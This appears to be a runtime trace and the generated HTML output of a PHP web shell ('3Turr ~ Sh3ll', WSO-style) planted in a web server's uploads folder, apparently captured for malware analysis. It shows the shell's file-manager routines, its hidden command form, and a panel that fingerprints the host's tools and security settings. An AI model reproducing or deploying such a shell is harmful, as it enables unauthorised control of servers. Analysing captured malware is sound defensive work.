4 A /var/www/html/uploads/flowers1.php 1283 $i = '-'
4 A /var/www/html/uploads/flowers1.php 1289 $i .= 'r'
4 A /var/www/html/uploads/flowers1.php 1290 $i .= 'w'
4 A /var/www/html/uploads/flowers1.php 1291 $i .= 'x'
4 A /var/www/html/uploads/flowers1.php 1292 $i .= 'r'
4 A /var/www/html/uploads/flowers1.php 1293 $i .= '-'
4 A /var/www/html/uploads/flowers1.php 1294 $i .= 'x'
4 A /var/www/html/uploads/flowers1.php 1295 $i .= 'r'
4 A /var/www/html/uploads/flowers1.php 1296 $i .= '-'
4 A /var/www/html/uploads/flowers1.php 1297 $i .= 'x'
4 308 1 0.196989 1023744
4 308 R '-rwxr-xr-x'
3 304 1 0.197003 1023768
3 304 R '<font color=white>-rwxr-xr-x</font>'
3 309 0 0.197019 1023768 filesize 0 /var/www/html/uploads/flowers1.php 1335 1 '/var/www/html/uploads/prepend.php'
3 309 1 0.197033 1023808
3 309 R 57
2 A /var/www/html/uploads/flowers1.php 1335 $tmp = ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root']
3 310 0 0.197067 1023392 is_file 0 /var/www/html/uploads/flowers1.php 1336 1 '/var/www/html/uploads/prepend.php'
3 310 1 0.197081 1023432
3 310 R TRUE
3 311 0 0.197094 1023328 array_merge 0 /var/www/html/uploads/flowers1.php 1336 2 ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root'] ['type' => 'file']
3 311 1 0.197119 1023768
3 311 R ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
2 A /var/www/html/uploads/flowers1.php 1336 $files[] = ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
2 A /var/www/html/uploads/flowers1.php 1333 $i++
2 A /var/www/html/uploads/flowers1.php 1339 GLOBALS['sort'] = [0 => 'name', 1 => 1]
3 312 0 0.197355 1023728 usort 0 /var/www/html/uploads/flowers1.php 1342 2 [0 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 1 => ['name' => 'flowers1.php', 'path' => '/var/www/html/uploads/flowers1.php', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 100449, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file'], 2 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']] 'wsoCmp'
4 313 0 0.197406 1024176 wsoCmp 1 /var/www/html/uploads/flowers1.php 1342 2 ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'] ['name' => 'flowers1.php', 'path' => '/var/www/html/uploads/flowers1.php', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 100449, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']
5 314 0 0.197435 1024176 strtolower 0 /var/www/html/uploads/flowers1.php 1340 1 '.htaccess'
5 314 1 0.197448 1024208
5 314 R '.htaccess'
5 315 0 0.197463 1024176 strtolower 0 /var/www/html/uploads/flowers1.php 1340 1 'flowers1.php'
5 315 1 0.197476 1024208
5 315 R 'flowers1.php'
5 316 0 0.197490 1024176 strcmp 0 /var/www/html/uploads/flowers1.php 1340 2 '.htaccess' 'flowers1.php'
5 316 1 0.197503 1024240
5 316 R -1
4 313 1 0.197518 1024176
4 313 R -1
4 317 0 0.197531 1024176 wsoCmp 1 /var/www/html/uploads/flowers1.php 1342 2 ['name' => 'flowers1.php', 'path' => '/var/www/html/uploads/flowers1.php', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 100449, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file'] ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
5 318 0 0.197558 1024176 strtolower 0 /var/www/html/uploads/flowers1.php 1340 1 'flowers1.php'
5 318 1 0.197571 1024208
5 318 R 'flowers1.php'
5 319 0 0.197585 1024176 strtolower 0 /var/www/html/uploads/flowers1.php 1340 1 'prepend.php'
5 319 1 0.197603 1024208
5 319 R 'prepend.php'
5 320 0 0.197617 1024176 strcmp 0 /var/www/html/uploads/flowers1.php 1340 2 'flowers1.php' 'prepend.php'
5 320 1 0.197630 1024240
5 320 R -1
4 317 1 0.197644 1024176
4 317 R -1
3 312 1 0.197657 1023800
3 312 R TRUE
3 321 0 0.197670 1023752 usort 0 /var/www/html/uploads/flowers1.php 1343 2 [0 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']] 'wsoCmp'
4 322 0 0.197699 1024200 wsoCmp 1 /var/www/html/uploads/flowers1.php 1343 2 ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'] ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
5 323 0 0.197724 1024200 strtolower 0 /var/www/html/uploads/flowers1.php 1340 1 '..'
5 323 1 0.197737 1024232
5 323 R '..'
5 324 0 0.197750 1024200 strtolower 0 /var/www/html/uploads/flowers1.php 1340 1 'data'
5 324 1 0.197762 1024232
5 324 R 'data'
5 325 0 0.197775 1024200 strcmp 0 /var/www/html/uploads/flowers1.php 1340 2 '..' 'data'
5 325 1 0.197788 1024264
5 325 R -3552051
4 322 1 0.197801 1024200
4 322 R -3552051
3 321 1 0.197814 1023824
3 321 R TRUE
3 326 0 0.197827 1023752 array_merge 0 /var/www/html/uploads/flowers1.php 1344 2 [0 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']] [0 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 1 => ['name' => 'flowers1.php', 'path' => '/var/www/html/uploads/flowers1.php', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 100449, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file'], 2 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']]
3 326 1 0.197871 1024192
3 326 R [0 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 2 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 3 => ['name' => 'flowers1.php', 'path' => '/var/www/html/uploads/flowers1.php', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 100449, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file'], 4 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']]
2 A /var/www/html/uploads/flowers1.php 1344 $files = [0 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 2 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 3 => ['name' => 'flowers1.php', 'path' => '/var/www/html/uploads/flowers1.php', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 100449, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file'], 4 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']]
2 A /var/www/html/uploads/flowers1.php 1345 $l = 0
3 327 0 0.197972 1023808 base64_encode 0 /var/www/html/uploads/flowers1.php 1346 1 '/var/www/html/uploads/..'
3 327 1 0.197986 1023904
3 327 R 'L3Zhci93d3cvaHRtbC91cGxvYWRzLy4u'
3 328 0 0.198005 1023904 htmlspecialchars 0 /var/www/html/uploads/flowers1.php 1349 1 '..'
3 328 1 0.198018 1024096
3 328 R '..'
3 329 0 0.198033 1023976 urlencode 0 /var/www/html/uploads/flowers1.php 1349 1 '..'
3 329 1 0.198046 1024040
3 329 R '..'
3 330 0 0.198059 1024072 urlencode 0 /var/www/html/uploads/flowers1.php 1349 1 '..'
3 330 1 0.198071 1024136
3 330 R '..'
3 331 0 0.198084 1024200 urlencode 0 /var/www/html/uploads/flowers1.php 1349 1 '..'
3 331 1 0.198096 1024264
3 331 R '..'
3 332 0 0.198109 1024264 urlencode 0 /var/www/html/uploads/flowers1.php 1349 1 '..'
3 332 1 0.198121 1024328
3 332 R '..'
2 A /var/www/html/uploads/flowers1.php 1350 $l = 1
3 333 0 0.198145 1023816 base64_encode 0 /var/www/html/uploads/flowers1.php 1346 1 '/var/www/html/uploads/data'
3 333 1 0.198158 1023928
3 333 R 'L3Zhci93d3cvaHRtbC91cGxvYWRzL2RhdGE='
3 334 0 0.198175 1023928 htmlspecialchars 0 /var/www/html/uploads/flowers1.php 1349 1 'data'
3 334 1 0.198188 1024120
3 334 R 'data'
3 335 0 0.198201 1023976 urlencode 0 /var/www/html/uploads/flowers1.php 1349 1 'data'
3 335 1 0.198214 1024040
3 335 R 'data'
3 336 0 0.198227 1024072 urlencode 0 /var/www/html/uploads/flowers1.php 1349 1 'data'
3 336 1 0.198239 1024136
3 336 R 'data'
3 337 0 0.198252 1024200 urlencode 0 /var/www/html/uploads/flowers1.php 1349 1 'data'
3 337 1 0.198263 1024264
3 337 R 'data'
3 338 0 0.198276 1024392 urlencode 0 /var/www/html/uploads/flowers1.php 1349 1 'data'
3 338 1 0.198288 1024456
3 338 R 'data'
2 A /var/www/html/uploads/flowers1.php 1350 $l = 0
3 339 0 0.198316 1023808 urlencode 0 /var/www/html/uploads/flowers1.php 1346 1 '.htaccess'
3 339 1 0.198329 1023880
3 339 R '.htaccess'
3 340 0 0.198343 1023848 base64_encode 0 /var/www/html/uploads/flowers1.php 1346 1 '.htaccess'
3 340 1 0.198355 1023928
3 340 R 'Lmh0YWNjZXNz'
3 341 0 0.198369 1023888 htmlspecialchars 0 /var/www/html/uploads/flowers1.php 1346 1 '.htaccess'
3 341 1 0.198382 1024080
3 341 R '.htaccess'
3 342 0 0.198396 1023880 yemenSize 1 /var/www/html/uploads/flowers1.php 1349 1 64
3 342 1 0.198410 1023912
3 342 R '64 B'
3 343 0 0.198423 1023944 urlencode 0 /var/www/html/uploads/flowers1.php 1349 1 '.htaccess'
3 343 1 0.198435 1024016
3 343 R '.htaccess'
3 344 0 0.198449 1024072 urlencode 0 /var/www/html/uploads/flowers1.php 1349 1 '.htaccess'
3 344 1 0.198462 1024144
3 344 R '.htaccess'
3 345 0 0.198475 1024200 urlencode 0 /var/www/html/uploads/flowers1.php 1349 1 '.htaccess'
3 345 1 0.198487 1024272
3 345 R '.htaccess'
3 346 0 0.198501 1024264 urlencode 0 /var/www/html/uploads/flowers1.php 1349 1 '.htaccess'
3 346 1 0.198512 1024336
3 346 R '.htaccess'
3 347 0 0.198525 1024456 urlencode 0 /var/www/html/uploads/flowers1.php 1349 1 '.htaccess'
3 347 1 0.198538 1024528
3 347 R '.htaccess'
3 348 0 0.198551 1024520 urlencode 0 /var/www/html/uploads/flowers1.php 1349 1 '.htaccess'
3 348 1 0.198562 1024592
3 348 R '.htaccess'
2 A /var/www/html/uploads/flowers1.php 1350 $l = 1
3 349 0 0.198586 1023816 urlencode 0 /var/www/html/uploads/flowers1.php 1346 1 'flowers1.php'
3 349 1 0.198599 1023888
3 349 R 'flowers1.php'
3 350 0 0.198613 1023856 base64_encode 0 /var/www/html/uploads/flowers1.php 1346 1 'flowers1.php'
3 350 1 0.198625 1023936
3 350 R 'Zmxvd2VyczEucGhw'
3 351 0 0.198640 1023896 htmlspecialchars 0 /var/www/html/uploads/flowers1.php 1346 1 'flowers1.php'
3 351 1 0.198653 1024088
3 351 R 'flowers1.php'
3 352 0 0.198667 1023912 yemenSize 1 /var/www/html/uploads/flowers1.php 1349 1 100449
4 353 0 0.198681 1023912 sprintf 0 /var/www/html/uploads/flowers1.php 1279 2 '%1.2f' 98.0947265625
4 353 1 0.198696 1024296
4 353 R '98.09'
3 352 1 0.198709 1023952
3 352 R '98.09 KB'
3 354 0 0.198723 1023976 urlencode 0 /var/www/html/uploads/flowers1.php 1349 1 'flowers1.php'
3 354 1 0.198735 1024048
3 354 R 'flowers1.php'
3 355 0 0.198749 1024072 urlencode 0 /var/www/html/uploads/flowers1.php 1349 1 'flowers1.php'
3 355 1 0.198762 1024144
3 355 R 'flowers1.php'
3 356 0 0.198776 1024200 urlencode 0 /var/www/html/uploads/flowers1.php 1349 1 'flowers1.php'
3 356 1 0.198788 1024272
3 356 R 'flowers1.php'
3 357 0 0.198801 1024264 urlencode 0 /var/www/html/uploads/flowers1.php 1349 1 'flowers1.php'
3 357 1 0.198813 1024336
3 357 R 'flowers1.php'
3 358 0 0.198827 1024456 urlencode 0 /var/www/html/uploads/flowers1.php 1349 1 'flowers1.php'
3 358 1 0.198839 1024528
3 358 R 'flowers1.php'
3 359 0 0.198852 1024520 urlencode 0 /var/www/html/uploads/flowers1.php 1349 1 'flowers1.php'
3 359 1 0.198864 1024592
3 359 R 'flowers1.php'
2 A /var/www/html/uploads/flowers1.php 1350 $l = 0
3 360 0 0.198892 1023808 urlencode 0 /var/www/html/uploads/flowers1.php 1346 1 'prepend.php'
3 360 1 0.198905 1023880
3 360 R 'prepend.php'
3 361 0 0.198918 1023848 base64_encode 0 /var/www/html/uploads/flowers1.php 1346 1 'prepend.php'
3 361 1 0.198931 1023928
3 361 R 'cHJlcGVuZC5waHA='
3 362 0 0.198945 1023888 htmlspecialchars 0 /var/www/html/uploads/flowers1.php 1346 1 'prepend.php'
3 362 1 0.198958 1024080
3 362 R 'prepend.php'
3 363 0 0.198972 1023880 yemenSize 1 /var/www/html/uploads/flowers1.php 1349 1 57
3 363 1 0.198986 1023912
3 363 R '57 B'
3 364 0 0.198999 1023944 urlencode 0 /var/www/html/uploads/flowers1.php 1349 1 'prepend.php'
3 364 1 0.199011 1024016
3 364 R 'prepend.php'
3 365 0 0.199025 1024072 urlencode 0 /var/www/html/uploads/flowers1.php 1349 1 'prepend.php'
3 365 1 0.199041 1024144
3 365 R 'prepend.php'
3 366 0 0.199054 1024200 urlencode 0 /var/www/html/uploads/flowers1.php 1349 1 'prepend.php'
3 366 1 0.199066 1024272
3 366 R 'prepend.php'
3 367 0 0.199080 1024264 urlencode 0 /var/www/html/uploads/flowers1.php 1349 1 'prepend.php'
3 367 1 0.199092 1024336
3 367 R 'prepend.php'
3 368 0 0.199105 1024456 urlencode 0 /var/www/html/uploads/flowers1.php 1349 1 'prepend.php'
3 368 1 0.199117 1024528
3 368 R 'prepend.php'
3 369 0 0.199130 1024520 urlencode 0 /var/www/html/uploads/flowers1.php 1349 1 'prepend.php'
3 369 1 0.199142 1024592
3 369 R 'prepend.php'
2 A /var/www/html/uploads/flowers1.php 1350 $l = 1
3 370 0 0.199166 1023752 htmlspecialchars 0 /var/www/html/uploads/flowers1.php 1353 1 '/var/www/html/uploads/'
3 370 1 0.199180 1023944
3 370 R '/var/www/html/uploads/'
3 371 0 0.199199 1023752 yemenfooter 1 /var/www/html/uploads/flowers1.php 1356 0
4 372 0 0.199239 1023752 is_writable 0 /var/www/html/uploads/flowers1.php 1174 1 '/var/www/html/uploads/'
4 372 1 0.199260 1023792
4 372 R TRUE
3 A /var/www/html/uploads/flowers1.php 1174 $is_writable = '<font color=#00ff00 >[ Writeable ]</font>'
4 373 0 0.199301 1023752 htmlspecialchars 0 /var/www/html/uploads/flowers1.php 1201 1 '/var/www/html/uploads/'
4 373 1 0.199315 1023944
4 373 R '/var/www/html/uploads/'
3 371 1 0.199331 1023752
2 25 1 0.199340 1016560
0.199379 926560
TRACE END [2023-02-12 22:32:49.191885]
Generated HTML code
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Type" content="text/html;
charset=utf-8">
<title>3Turr ~ Sh3ll</title>
<link rel="shortcut icon" type="image/x-icon" href="https://avatars1.githubusercontent.com/u/13343571?v=3&s=460">
<script language="javascript">
function Encoder(name)
{
var e = document.getElementById(name);
e.value = btoa(e.value);
return true;
}
function Encoder2(name)
{
var e = document.getElementById(name);
e.value = btoa(e.value);
return true;
}
</script>
<style type="text/css">
<!--
.headera {
color: red;
}
.whole {
height:auto;
width: auto;
margin-top: 10px;
margin-right: 10px;
margin-left: 10px;
background-image: linear-gradient(
rgba(0, 0, 0, 0.4),
rgba(0, 0, 0, 0.4)
), url(http://img03.arabsh.com/uploads/image/2012/09/11/0d37424266f70d.png);
}
.header {
table-layout: fixed;
height: auto;
width: auto;
border: 4px solid #5BEEFF;
color: yellow;
font-size: 12px;
font-family: Verdana, Geneva, sans-serif;
}
tr {
display: table-row;
vertical-align: inherit;
padding-right:10px;
}table {
display: table;
border-collapse: separate;
border-spacing: 2px;
border-color: #5BEEFF;
}
.header a {color:#0F0;
text-decoration:none;
}
span {
font-weight: bolder;
color: #FFF;
}
#meunlist {
font-family: Verdana, Geneva, sans-serif;
color: #FFF;
background-color: #000;
width: auto;
border-right-width: 7px;
border-left-width: 7px;
border-top-style: solid;
border-right-style: solid;
border-bottom-style: solid;
border-left-style: solid;
border-color: #5BEEFF;
height: auto;
font-size: 12px;
font-weight: bold;
border-top-width: 0px;
}
.whole #meunlist ul {
padding-top: 5px;
padding-right: 5px;
padding-bottom: 7px;
padding-left: 2px;
text-align:center;
list-style-type: none;
margin: 0px;
}
.whole #meunlist li {
margin: 0px;
padding: 0px;
display: inline;
}
.whole #meunlist a {
font-family: arial, sans-serif;
font-size: 14px;
text-decoration:none;
font-weight: bold;
color: #fff;
clear: both;
width: 100px;
margin-right: -6px;
padding-top: 3px;
padding-right: 15px;
padding-bottom: 3px;
padding-left: 15px;
border-right-width: 1px;
border-right-style: solid;
border-right-color: #FFF;
}
.whole #meunlist a:hover {
color: red;
background: #fff;
}
.menu a:hover { background:#5BEEFF;
}
a:hover { color:red;
background:black;
}
.ml1 { border:1px solid #2438CF;
padding:5px;
margin:0;
overflow: auto;
}
.bigarea { width:100%;
height:250px;
border:1px solid red;
background:#171717;
}
input, textarea, select { margin:0;
color:#FF0000;
background-color:#000;
border:1px solid #5BEEFF;
font: 9pt Monospace,"Times New roman";
}
form { margin:0px;
}
#toolsTbl { text-align:center;
}
.toolsInp { width: 80%;
}
.main th {text-align:left;
background-color:#990000;
color:white;
}
.main td, th{vertical-align:middle;
}
pre {font-family:Courier,Monospace;
}
#cot_tl_fixed{position:fixed;
bottom:0px;
font-size:12px;
left:0px;
padding:4px 0;
clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);
_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);
}
}.foottable {
width: 300px;
font-weight: bold;
}.main th{text-align:left;
}
.main a{color: #FFF;
}
.main tr:hover{background-color:red;
}
.ml1{ border:1px solid #444;
padding:5px;
margin:0;
overflow: auto;
}
.bigarea{ width:99%;
height:300px;
}
</style>
<script>
var c_ = 'L3Zhci93d3cvaHRtbC8=';
var a_ = 'FilesMan'
var charset_ = 'Windows-1251';
var p1_ = '';
var p2_ = '';
var p3_ = '';
var d = document;
function set(a,c,p1,p2,p3,charset) {
if(a!=null)d.mf.a.value=a;
else d.mf.a.value=a_;
if(c!=null)d.mf.c.value=c;
else d.mf.c.value=c_;
if(p1!=null)d.mf.p1.value=p1;
else d.mf.p1.value=p1_;
if(p2!=null)d.mf.p2.value=p2;
else d.mf.p2.value=p2_;
if(p3!=null)d.mf.p3.value=p3;
else d.mf.p3.value=p3_;
if(charset!=null)d.mf.charset.value=charset;
else d.mf.charset.value=charset_;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
d.mf.submit();
}</script>
</head>
<body bgcolor="#000000" color="red" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"><div class="whole1"></div>
<div style="position:absolute;
top:30px;
right:50px;
font-size:25px;
font-family:auto;
z-index:-1;
" rowspan="8"><font color="red"><img height="190px" alt="3Turr" src="http://i.imgur.com/mVdgU0V.png"></font><center><font style="color:#5BEEFF;
text-shadow: 1px 1px 36px #5BEEFF, 0 0 25px #5BEEFF, 0 0 30px #5BEEFF, 0 0 30px #5BEEFF;
">3</font><font style="color:red;
text-shadow: 1px 1px 36px red, 0 0 25px red, 0 0 30px red;
">Turr</font>
</center></div>
<div class="whole">
<form method="post" name="mf" style="display:none;
">
<input type="hidden" name="a">
<input type="hidden" name="c">
<input type="hidden" name="p1">
<input type="hidden" name="p2">
<input type="hidden" name="p3">
<input type="hidden" name="charset">
</form>
<div class="header"><table class="headmain" width="100%" border="0" align="lift">
<tbody><tr>
<td width="3%"><span>Uname:</span></td>
<td colspan="2">Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</td>
</tr>
<tr>
<td><span>User:</span></td>
<td>33 [ www-data ] <span> Group: </span>33 [ www-data ]
</td></tr>
<tr>
<td><span>PHP:</span></td>
<td>7.2.34-37+ubuntu22.04.1+deb.sury.org+1 <span> Safe Mode: <font color="#0F0">OFF</font></span></td>
</tr>
<tr>
<td><span>IP:</span></td>
<td>::1 <span>Server IP:</span> ::1</td>
</tr>
<tr>
<td><span>WEBS:</span></td>
<td width="76%">CANT READ named.conf</td>
</tr>
<tr>
<td height="16"><span>HDD:</span></td>
<td>216.08 GB <span>Free:</span>189.27 GB [87%]</td>
</tr><tr><td height="18" colspan="2"><span>Useful : </span>gcc,cc,ld,make,php,perl,tar,gzip,bzip2,nc,</td>
</tr>
<tr>
<td height="0" colspan="2"><span>Downloader: </span>wget,curl,lwp-mirror,</td>
</tr><tr>
<td height="16" colspan="2"><span>Disabled functions : </span><font color="red" style="word-wrap: break-word;
width: 80%;
">pcntl_alarm, pcntl_fork, pcntl_waitpid, pcntl_wait, pcntl_wifexited, pcntl_wifstopped, pcntl_wifsignaled, pcntl_wifcontinued, pcntl_wexitstatus, pcntl_wtermsig, pcntl_wstopsig, pcntl_signal, pcntl_signal_get_handler, pcntl_signal_dispatch, pcntl_get_last_error, pcntl_strerror, pcntl_sigprocmask, pcntl_sigwaitinfo, pcntl_sigtimedwait, pcntl_exec, pcntl_getpriority, pcntl_setpriority, pcntl_async_signals, </font></td>
</tr>
<tr>
<td height="16" colspan="2"><span>cURL:<font color="#0F0"> ON </font> MySQL:<font color="red"> OFF </font> MSSQL:<font color="red"> OFF </font> PostgreSQL:<font color="red"> OFF </font> Oracle: </span><font color="red"> OFF </font></td><td width="15%"></td>
</tr>
<tr>
<td height="11" style="width:70%" colspan="3"><span>Open_basedir:<font color="#0F0"> NONE </font> Safe_mode_exec_dir:<font color="#0F0"> NONE </font> Safe_mode_include_dir:<font color="#0F0"> NONE </font></span></td>
</tr>
<tr>
<td height="11"><span>Server </span></td>
<td colspan="2">Apache/2.4.52 (Ubuntu)</td>
</tr><tr>
<td height="12"><span>PWD:</span></td>
<td colspan="2"><a href="#" onclick="g("FilesMan","/")">/</a><a href="#" onclick="g("FilesMan","/var/")">var/</a><a href="#" onclick="g("FilesMan","/var/www/")">www/</a><a href="#" onclick="g("FilesMan","/var/www/html/")">html/</a> <a href="#" onclick="g('FilesMan','L3Zhci93d3cvaHRtbA==')"><font color="red">[HOME]</font></a></td>
</tr>
</tbody></table>
</div>
<div id="menu-box">
<style type="text/css">
div#menu{height:40px;
:url(http://apycom.com/ssc-data/items/1/00bfff/images/main-bg.png) repeat-x;
}
div#menu ul{margin:0;
padding:0;
list-style:none;
float:left;
}
div#menu ul.menu {padding-left:10px;
}
div#menu li{position:relative;
z-index:9;
margin:0;
padding:0 5px 0 0;
display:block;
float:left;
}
div#menu li:hover>ul {left:-2px;
}
div#menu a {position:relative;
z-index:10;
height:40px;
display:block;
float:left;
line-height:40px;
text-decoration:none;
font:normal 13px Trebuchet MS;
}
div#menu a:hover {color:#000;
}
div#menu li.current a {}
div#menu span {display:block;
cursor:pointer;
background-repeat:no-repeat;
background-position:95% 0;
}
div#menu ul ul a.parent span {background-position:95% 8px;
background-image:url(http://apycom.com/ssc-data/items/1/00bfff/images/item-pointer.gif);
}
div#menu ul ul a.parent:hover span {background-image:url(http://apycom.com/ssc-data/items/1/00bfff/images/item-pointer-mover.gif);
}
div#menu a {padding:0 6px 0 10px;
line-height:30px;
color:#fff;
}
div#menu span {margin-top:5px;
}
div#menu li {background:url(http://apycom.com/ssc-data/items/1/00bfff/images/main-delimiter.png) 98% 4px no-repeat;
}
div#menu li.last {background:none;
}
div#menu ul ul li {background:none;
}
div#menu ul ul {position:absolute;
top:38px;
left:-999em;
width:180%;
padding:1px 0 0 0;
background:rgb(45,45,45);
margin-top:1px;
}
div#menu ul ul a {padding:0 0 0 15px;
height:auto;
float:none;
display:block;
line-height:24px;
color:rgb(169,169,169);
}
div#menu ul ul span {margin-top:0;
padding-right:15px;
_padding-right:20px;
color:rgb(169,169,169);
}
div#menu ul ul a:hover span {color:#fff;
}div#menu ul ul li.last {background:none;
}
div#menu ul ul li {width:100%;
}div#menu ul ul ul {padding:1;
margin:-38px 0 0 163px !important;
margin-left:172px;
}div#menu ul ul ul {background:rgb(41,41,41);
}
div#menu ul ul ul ul {background:rgb(38,38,38);
}div#menu ul ul ul ul {background:rgb(35,35,35);
}
div#menu li.back {background:url(http://apycom.com/ssc-data/items/1/00bfff/images/lava.png) no-repeat right -44px !important;
background-image:url(http://apycom.com/ssc-data/items/1/00bfff/images/lava.gif);
width:13px;
height:44px;
z-index:8;
position:absolute;
margin:-1px 0 0 -5px;
}
div#menu li.back .left {background:url(http://apycom.com/ssc-data/items/1/00bfff/images/lava.png) no-repeat top left !important;
background-image:url(http://apycom.com/ssc-data/items/1/00bfff/images/lava.gif);
height:44px;
margin-right:8px;
}
</style>
<div id="menu"><ul class="menu">
<li><a href="#" onclick="g('FilesMan',null,'','','')">HOME</a></li>
<li><a href="#" onclick="g('proc',null,'','','')">SYSTEM</a></li>
<li><a href="#">PHP</a>
<ul>
